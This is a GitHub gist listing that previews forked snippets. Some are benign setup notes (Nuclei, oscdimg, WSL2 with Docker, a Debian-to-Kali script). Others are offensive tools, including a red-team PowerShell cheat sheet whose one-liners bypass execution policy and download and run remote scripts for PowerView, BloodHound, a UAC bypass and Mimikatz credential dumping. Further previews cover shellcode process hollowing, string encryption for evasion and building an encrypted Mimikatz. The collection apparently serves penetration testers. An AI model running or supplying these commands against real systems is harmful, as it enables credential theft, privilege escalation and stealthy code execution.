ac1d AssassinUKG
@AssassinUKG
AssassinUKG / Nuclei.md
Created March 26, 2025 21:55 — forked from E1A/Nuclei.md
Full Nuclei cheatsheet and explanation

Intro

"Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks."

FAQ

  • Q: What is nuclei?
  • A: Nuclei is a fast and customizable vulnerability scanner based on simple YAML-based templates.
@AssassinUKG
AssassinUKG / OSCDIMG_notes
Created November 20, 2024 23:21 — forked from rpc180/OSCDIMG_notes
Using oscdimg.exe to create a bootable Windows ISO with updated contents
# oscdimg.exe is installed along with the Microsoft Windows 10 Deployment Toolkit,
# located in "C:\Program Files (x86)\Windows Kits\10\Assessment and Deployment Kit\Deployment Tools"
# Copy etfsboot.com and efisys.bin into the same folder as the executable so it can resolve them:
# argument locations are relative paths; it does not seem to support absolute paths from root.
# The 2#p0 stuff is not a typo.
oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,betfsboot.com#pEF,e,befisys.bin Win10_source\subfolder unattend_Win10Ent1607x64.iso
oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,bd:\workingmount\boot\etfsboot.com#pEF,e,bd:\workingmount\efi\microsoft\boot\efisys.bin d:\workingmount d:\support\Server2016_Test.iso
@AssassinUKG
AssassinUKG / no_strings.hpp
Created October 24, 2024 12:37 — forked from EvanMcBroom/no_strings.hpp
Encrypt Strings at Compile Time
// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
@AssassinUKG
AssassinUKG / docker-wsl2.md
Created September 24, 2024 14:52 — forked from martinsam16/docker-wsl2.md
How to install wsl2 ubuntu + docker + docker-compose

Activate wsl2

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
wsl --set-default-version 2

Install and Configure Ubuntu

@AssassinUKG
AssassinUKG / makekali.sh
Created August 29, 2024 18:37 — forked from warecrash/makekali.sh
Convert Debian to Kali
apt update
apt -y install wget gnupg dirmngr
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -
apt update
apt -y upgrade
apt -y dist-upgrade
apt -y autoremove --purge
@AssassinUKG
AssassinUKG / RedTeam_CheatSheet.ps1
Created August 18, 2024 20:39 — forked from MHaggis/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@AssassinUKG
AssassinUKG / DynWin32-ShellcodeProcessHollowing.ps1
Created July 17, 2024 14:29 — forked from qtc-de/DynWin32-ShellcodeProcessHollowing.ps1
PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.
@AssassinUKG
AssassinUKG / gist:f6061886ec409f0210c986ca480d5442
Created March 7, 2024 20:58 — forked from thesubtlety/gist:5d30bc04f087807d817cf4479a481c23
Download compile and encrypt the latest mimikatz
#requires -version 2
<#
Author: Noah
@subTee's reflexive loader
Required Dependencies: msbuild, csc
Execute: Run-UpdateKatz -Verbose
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@AssassinUKG
AssassinUKG / main.cpp
Created January 31, 2024 11:56 — forked from hasherezade/main.cpp
Get PEB64 from a WOW64 process
#include <Windows.h>
#include <iostream>
#include "ntdll_undoc.h"
PPEB get_default_peb()
{
#if defined(_WIN64)
return (PPEB)__readgsqword(0x60);
#else